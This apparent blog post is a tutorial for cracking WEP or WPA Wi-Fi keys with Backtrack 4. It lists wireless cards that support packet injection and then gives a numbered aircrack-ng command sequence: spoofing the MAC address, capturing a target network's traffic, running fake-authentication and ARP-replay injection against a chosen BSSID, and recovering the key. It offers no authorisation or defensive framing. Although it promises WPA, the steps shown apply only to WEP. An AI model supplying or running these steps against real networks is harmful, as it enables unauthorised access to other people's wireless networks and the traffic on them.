This is the original tutorial of my friend about how to crack WEP or WPA using Backtrack 4 Linux.
Before you setup your cracking machine which is backtrack 4 you need to make sure that your backtrack 4's version is the r2 not the final because the final is for cracking WEP only. The Backtrack 4 r2 let' you crack WPA or WEP..
Now before you do some cracking make sure that you have good wireless cards and that if you don't know what wireless cards to buy here is the list(Source: from the BT4 Wiki):
AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed
Rockland N3 - (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers -passed
Edimax EW-7318USG USB - (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers -passed
ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers -passed
Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers -passed
Ubiquiti SRC - using the mac80211 ath9k drivers-passed
Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers-passed
Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers-passed
Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers-passed
Netgear wg111v2 - using the mac80211 rtl8187 drivers-passed
ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed
Intel 4956/5xxx - using the iwlagn drivers - passed
Usually, the edimax usb wifi adaptor or the wireless card is good for Backtrack 4 or the wireless card for bt4. A wifi card that supports packet injection and RF MON (monitor mode)
Now if your all setup with backtrack 4 then you may now start cracking(Oops! Make sure you already setup your bt4 connection.)
1. Boot computer with Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap
No comments:
Post a Comment